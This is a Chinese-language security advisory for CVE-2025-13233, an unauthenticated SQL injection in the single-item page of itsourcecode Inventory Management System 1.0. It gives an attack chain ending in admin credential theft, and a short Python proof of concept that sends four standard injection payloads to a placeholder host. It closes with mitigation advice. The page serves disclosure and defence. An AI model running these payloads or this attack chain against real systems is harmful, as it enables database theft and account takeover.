CVE-2025-13233 CVSS 7.3 高危

CVE-2025-13233 itsourcecode Inventory Management System 1.0 SQL注入漏洞

披露日期: 2025-11-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13233

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Inventory Management System 1.0

漏洞概述

itsourcecode Inventory Management System 1.0存在SQL注入漏洞，攻击者可通过构造恶意的ID参数值注入SQL语句，从而获取数据库敏感信息或进行进一步攻击。该漏洞存在于/index.php?q=single-item页面，攻击者无需认证即可利用此漏洞。由于该漏洞的利用代码已公开，攻击门槛较低，建议尽快修复。

技术细节

该漏洞为典型的基于GET请求的SQL注入漏洞。攻击者通过访问/index.php?q=single-item页面，并使用ID参数传递恶意构造的SQL payload。漏洞产生的根本原因是应用程序未对用户输入进行充分的参数化查询或输入过滤。攻击者可利用UNION SELECT、布尔盲注或时间盲注等技术从数据库中提取敏感信息，包括用户名、密码哈希、数据库版本等。由于漏洞位于产品查询功能模块，攻击成功可能导致整个系统的数据库信息泄露。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标站点使用的itsourcecode Inventory Management System 1.0版本

STEP 2

步骤2: 漏洞探测

访问/index.php?q=single-item页面，使用ID参数测试SQL注入

STEP 3

步骤3: 注入点确认

通过布尔盲注或错误回显确认注入点存在

STEP 4

步骤4: 数据提取

使用UNION注入或盲注技术提取数据库中的敏感信息

STEP 5

步骤5: 权限提升

获取管理员凭证后尝试登录后台管理系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13233 SQL Injection PoC
# Target: itsourcecode Inventory Management System 1.0
# Endpoint: /index.php?q=single-item

target_url = "http://target.com/index.php?q=single-item"

# Basic SQL Injection test payloads
payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL--",
    "' AND SLEEP(5)--",
    "' OR 1=1 LIMIT 1--"
]

for payload in payloads:
    params = {'id': payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"Payload: {payload}")
        print(f"Status: {response.status_code}")
        if 'error' in response.text.lower() or 'sql' in response.text.lower():
            print("Potential SQL injection detected")
        print("-" * 50)
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")

影响范围

itsourcecode Inventory Management System 1.0

防御指南

临时缓解措施

立即使用参数化查询重构index.php中single-item页面的数据库查询代码，对ID参数进行严格的输入验证和类型检查。暂时可使用WAF规则阻止包含SQL注入特征的请求。建议在生产环境中部署入侵检测系统监控可疑的SQL注入尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13233
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13233
3 Details https://www.cvedetails.com/cve/CVE-2025-13233/
4 VulDB https://vuldb.com/cve/CVE-2025-13233
5 Link https://github.com/3169417664/cve/issues/2
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332559
8 Link https://vuldb.com/?id.332559
9 Link https://vuldb.com/?submit.686683

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表